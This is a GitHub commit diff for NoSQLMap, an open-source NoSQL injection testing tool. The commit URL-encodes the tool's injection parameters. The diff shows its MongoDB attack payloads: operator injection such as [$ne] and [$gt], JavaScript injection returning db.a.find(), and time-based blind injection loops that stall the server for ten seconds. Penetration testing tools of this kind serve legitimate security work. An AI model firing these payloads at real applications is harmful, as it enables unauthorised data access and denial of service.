Skip to content

Commit 47dd13f

Browse files
codingocodingo
authored
Merge pull request #59 from abdilahrf/master
Use Urllib Quote for parameter value
2 parents ae0b461 + 71bcf45 commit 47dd13f

File tree

3 files changed

+21
-19
lines changed

3 files changed

+21
-19
lines changed

nosqlmap.py

+6-5
Original file line numberDiff line numberDiff line change
@@ -1,3 +1,4 @@
1+
# -*- coding: utf-8 -*-
12
#!/usr/bin/python
23
# NoSQLMap Copyright 2012-2017 NoSQLMap Development team
34
# See the file 'doc/COPYING' for copying permission
@@ -55,11 +56,11 @@ def mainMenu():
5556
mmSelect = True
5657
while mmSelect:
5758
os.system('clear')
58-
  print " _ _ ___ ___ _ __ __           "
59-
  print "| \| |___/ __|/ _ \| | | \/ |__ _ _ __ "
60-
  print "| .` / _ \__ \ (_) | |__| |\/| / _` | '_ \"
61-
  print "|_|\_\___/___/\__\_\____|_| |_\__,_| .__/"
62-
  print " v0.7 codingo@protonmail.com      |_|   "
59+
print " _ _ ___ ___ _ __ __           "
60+
print "| \| |___/ __|/ _ \| | | \/ |__ _ _ __ "
61+
print "| .` / _ \__ \ (_) | |__| |\/| / _` | '_ \\"
62+
print("|_|\_\___/___/\__\_\____|_| |_\__,_| .__/")
63+
print(" v0.7 codingo@protonmail.com      |_|   ")
6364
print "\n"
6465
print "1-Set options"
6566
print "2-NoSQL DB Access Attacks"

nsmweb.py

+14-14
Original file line numberDiff line numberDiff line change
@@ -915,24 +915,24 @@ def buildUri(origUri, randValue):
915915
if paramName[x] in injOpt:
916916
uriArray[0] += paramName[x] + "=" + randValue + "&"
917917
uriArray[1] += paramName[x] + "[$ne]=" + randValue + "&"
918-
uriArray[2] += paramName[x] + "=a'; return db.a.find(); var dummy='!" + "&"
919-
uriArray[3] += paramName[x] + "=1; return db.a.find(); var dummy=1" + "&"
920-
uriArray[4] += paramName[x] + "=a'; return db.a.findOne(); var dummy='!" + "&"
921-
uriArray[5] += paramName[x] + "=1; return db.a.findOne(); var dummy=1" + "&"
922-
uriArray[6] += paramName[x] + "=a'; return this.a != '" + randValue + "'; var dummy='!" + "&"
923-
uriArray[7] += paramName[x] + "=1; return this.a !=" + randValue + "; var dummy=1" + "&"
918+
uriArray[2] += paramName[x] + "=" + urllib.quote("a'; return db.a.find(); var dummy='!") + "&"
919+
uriArray[3] += paramName[x] + "=" + urllib.quote("1; return db.a.find(); var dummy=1") + "&"
920+
uriArray[4] += paramName[x] + "=" + urllib.quote("a'; return db.a.findOne(); var dummy='!") + "&"
921+
uriArray[5] += paramName[x] + "=" + urllib.quote("1; return db.a.findOne(); var dummy=1") + "&"
922+
uriArray[6] += paramName[x] + "=" + urllib.quote("a'; return this.a != '" + randValue + "'; var dummy='!") + "&"
923+
uriArray[7] += paramName[x] + "=" + urllib.quote("1; return this.a !=" + randValue + "; var dummy=1") + "&"
924924
uriArray[8] += paramName[x] + "[$gt]=&"
925-
uriArray[9] += paramName[x] + "=1; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=1" + "&"
926-
uriArray[10] += paramName[x] + "=a\"; return db.a.find(); var dummy='!" + "&"
927-
uriArray[11] += paramName[x] + "=a\"; return this.a != '" + randValue + "'; var dummy='!" + "&"
928-
uriArray[12] += paramName[x] + "=a\"; return db.a.findOne(); var dummy=\"!" + "&"
929-
uriArray[13] += paramName[x] + "=a\"; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=\"!" + "&"
930-
uriArray[14] += paramName[x] + "a'; return true; var dum='a"
925+
uriArray[9] += paramName[x] + "=" + urllib.quote("1; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=1") + "&"
926+
uriArray[10] += paramName[x] + "=" + urllib.quote("a\"; return db.a.find(); var dummy='!") + "&"
927+
uriArray[11] += paramName[x] + "=" + urllib.quote("a\"; return this.a != '" + randValue + "'; var dummy='!") + "&"
928+
uriArray[12] += paramName[x] + "=" + urllib.quote("a\"; return db.a.findOne(); var dummy=\"!") + "&"
929+
uriArray[13] += paramName[x] + "=" + urllib.quote("a\"; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=\"!") + "&"
930+
uriArray[14] += paramName[x] + urllib.quote("a'; return true; var dum='a")
931931
uriArray[15] += paramName[x] + "1; return true; var dum=2"
932932
#Add values that can be manipulated for database attacks
933-
uriArray[16] += paramName[x] + "=a\'; ---"
933+
uriArray[16] += paramName[x] + "=" + urllib.quote("a\'; ---")
934934
uriArray[17] += paramName[x] + "=1; if ---"
935-
uriArray[18] += paramName[x] + "=a'; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy='!" + "&"
935+
uriArray[18] += paramName[x] + "=" + urllib.quote("a'; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy='!") + "&"
936936

937937
else:
938938
uriArray[0] += paramName[x] + "=" + paramValue[x] + "&"

prison

+1
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+

0 commit comments

Comments
 (0)